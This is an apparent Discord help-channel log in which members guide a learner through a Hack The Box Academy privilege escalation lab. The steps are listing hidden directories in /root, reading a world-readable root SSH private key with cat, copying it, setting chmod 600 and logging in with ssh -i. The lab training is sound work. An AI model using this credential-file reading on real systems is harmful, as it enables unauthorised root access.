things hide in the /root/
weird. i was having trouble accessing root even as user 2
yes accessing specifically root however some things that are hidden can be seen
are you still taking about academy ?
yes
hidden directories are crucial to finding information
ok so im back at user2 but it wont let me use the hidden directory command again
hidden directory command?
ls -la?
you can do alias ls="ls -la", saves lives
¯\_(ツ)_/¯
it's not hard to remember
yea it shows only a flag
that i already used
ah
by default it's the current directory
i understand that. still only gives me the original flag
no; it doesn't
well it did
ls -la /root/ should list all files/directories in /root/
ill send a screen shot
there may be another file called flag.txt in the root dir
yes
but it's not the same
i guess i need to chmod but im still confused on how to do that
you don't need to chmod anything to do with flags
it says i need to escalate my privileges to root
indeed you do
thats what ive been asking
there's a hidden directory in /root/
O_O
US academy 3 also works for me as a spawn machine
that's what we've been trying to guide you to
we're leading you to the answer and having you put the pieces together yourself
i understand im just very confused
the hint says to chmod..
i know that
chmod [perms] file
but that's beside the point
unless you find the file it's all moot
bc you need to copy that file to your attack system
its the key file
i got to that point and then i got into chmod and my whole thing messed up so i had to start over
begins with -----BEGIN
yes mam
if you have the key copied over to your attack system then you can start from there
bc if you just try to ssh with that file you'll get an error saying something like "permissions too broad" or something like that
user|group|others
1 = x(execute)
2 = w(write)
4 = r(read)
might be a bit of an overload to introduce octal perms now 
you can add the numbers together to get perms
rw------- = 600
rw-rw---- =660
rw-rw-rw- = 666
i mean chmod also has a manual entry ¯\_(ツ)_/¯
that can be easily be referenced
the article i linked goes over the simpler chmod u/g/o/a+perm format
fair
imo the octal format is much better but that's just because it's easier for me to parse
777 = "why do you need everybody to use this???"
you don't need to use keygen
ok well im back into user 2
the ssh key already exists for root
(and keygen only creates the key for your user)
ls -la /root/ and look for a hidden directory that might hold the key
look at the output of
ls -la /root/
you will see there's more there than just flag.txt
yes
what folder do YOU think has what you're looking for
think: what protocol did you use to connect as user1
ssh
yes
now connect the dots
ls -la /root/[hidden directory] (replace [hidden directory] with the hidden directory you found)
in pretty much most filesystems a . indicates a hidden directory
not visible unless you specify you're looking for all
so /root/.whatever
i did
so you should see a file there; and it's interesting the perms on it
all i see is flag.txt
and we're back at square -1
show your output please
Getting Started Knowledge check yeah?
there's something getting lost in translation between us
show your output
ls -la is one command
ohhhh
-la is flags for ls
rw------- 1 user2 user2 38 Feb 12 2021 flag.txt
-rw------- 1 user2 user2 2667 Jan 21 18:27 key
-rw-r--r-- 1 user2 user2 614 Jan 21 18:27 key.pub
man ls
i suggest taking the linux beginners course ... no offense
drwxr-x--- 1 root user2 4096 Feb 12 2021 .
drwxr-xr-x 1 root root 4096 Jan 21 17:53 ..
-rwxr-x--- 1 root user2 5 Aug 19 2020 .bash_history
-rwxr-x--- 1 root user2 3106 Dec 5 2019 .bashrc
-rwxr-x--- 1 root user2 161 Dec 5 2019 .profile
drwxr-x--- 1 root user2 4096 Feb 12 2021 .ssh
-rwxr-x--- 1 root user2 1309 Aug 19 2020 .viminfo
-rw------- 1 root root 33 Feb 12 2021 flag.txt
man this sure does look interesting now doesn't it
no offense taken
it does!
ls -la /root/[hidden directory]
hit in the head, ask your mother to apologize for dropping you too 
(at least you're picking it up though)
ok so i see that, but i cannot cat the file without the right permissions
yes, you can't cat flag.txt
maybe because you have to login as root
but you can cat something else
no
maybe the profile lol
back to square -1
think again about the protocol you're using
look @ hidden dir
connect the dots, where would the key be located at?
[yes i know everything in linux is a file]
im using ssh but .ssh is directory
yes
and i'm telling you to look there
drwxr-x--- 1 root user2 4096 Feb 12 2021 .
drwxr-x--- 1 root user2 4096 Feb 12 2021 ..
-rw------- 1 root root 571 Feb 12 2021 authorized_keys
-rw-r--r-- 1 root root 2602 Feb 12 2021 id_rsa
-rw-r--r-- 1 root root 571 Feb 12 2021 id_rsa.pub
great
ooh man i wonder what one of those could be useful
me me me
authorized keys!!!
incorrect
one of the other two then lmao
authorized keys are for another purpose
For this module, are we supposed to know the password of the user wley from a past module section?
look at your permissions
644 is crazy
i cant i dont know user 2 password
yes, also you can specify the password in your command user:pass
permissions in this case refers to the file permissions
the rw-|r--|r-- perms
in fact why does the id file have global read 
it has root permissions
because the admin is dumb
doesn't matter
user|group|others
the key part here is the others
user/group should have read/read-write permissions
but not others (as in all other users)
cat /root/.ssh/id_rsa
?
why don't you look into your own .ssh folder and see what is there?
bingo
also in future; don't ask for confirmation before doing
just do it and if it fails, come back and ask
I am not sure what you mean. Tried adding wley:pass to that command.
you'll need to copy/paste
yes its the private key
um hi
english only
sorry
well you will need to give it the actual password
live class dutch
I don't know the actual password and didn't see it in the module. That is why I asked was it a password that we use from a past module ?
ok
I said yes in my previous reply
^
these modules reuse creds a lot in their sections
oh okay I see now
you don't need to refer to a previous modules for creds btw that would defeat the purpose of them being self-contained
if you need to attain creds; then the module has/or gave you a way within the scope of it to attain them
this isn't the discord for that @late surge
previous section, not module yeah
ok
important distinction :D
as much as i hate pedantry this is important
so telnet{user ip}
what?
this channel is specifically for https://academy.hackthebox.com/ modules
if you don't know what HTB is then please read #welcome ; if you've read welcome and realize this server isn't for you - Goodbye
i can hack you in 3 min
sure kid
damn that's crazy
ok so i have the private key...
...
you now just need to set chmod your key to the right perms
127.0.0.1
you cant even hack with just an ip lol
i mean you can
that's kinda how hacking works
you start with an exposed service on an ip; and work from there
i mean yea
let me introduce you to the hackthebox platform, where you are only given a single ip
sometimes public, sometimes private (labs and challenges)
@steel grail i linked an article earlier about linux file permissions, and did a brief explanation of octal permissions btw
but in short you want to make sure only the user/group has read/read-write permissions
chmod /root/.ssh/id_rsa
nope
you can't chmod it as you aren't the owner
as I said earlier you gotta copy/paste it
also it's chmod [permissions] file
id_rsa needs 6xx
but if you copy it to your attack box you can easily just do it from there
they need to have it be mutable first
so they need to make a copy for themselves
chmod 600 /root/.ssh/id_rsa
chmod: changing permissions of '/root/.ssh/id_rsa': Operation not permitted
ok you aren't listening
maybe wrong machine ?
i copied and pasted the key
you need to copy/paste the contents of the file to your own machine
then you just chmod that file
so you cat the id_rsa file -> select all -> copy -> paste into a text editor on your attack machine -> save -> chmod [permissions] file
you can't change the id_rsa that exists in /root/ bc it's owned by root
its in a plaintext editor on my VM
But what if you login as root, won't it work?
guess what we wanna do with the id_rsa
or is it vim /root/.ssh/id_rsa
you need to copy from
-----BEGIN OPENSSH PRIVATE KEY----- to -----END OPENSSH PRIVATE KEY-----
i sure did
it doesn't matter what you save the filename as
or what editor you used
i know
now how do you use id files with ssh?
its on my desktop as plaintext.txt
Getting Started - Privilege Escalation
no good start tbh
literally just ran through this on my machine and it works
at this point it's literally just user error ¯\_(ツ)_/¯
layer 8 yes
I know it works im just stuck on what i do with the key
ssh -i
its on my desktop
later
in a plaintext file
you'll figure it out
i do the pentester path to do CTSP later, i suggest taking the basic modules
if you miss basics you will get very frustrated
yall tell to me to chmod it but i cant
easy
i thought this was basic
just use -i /path/to/plaintext.txt
tbf this is relatively basic usage of tools
https://academy.hackthebox.com/modules -> fundamentals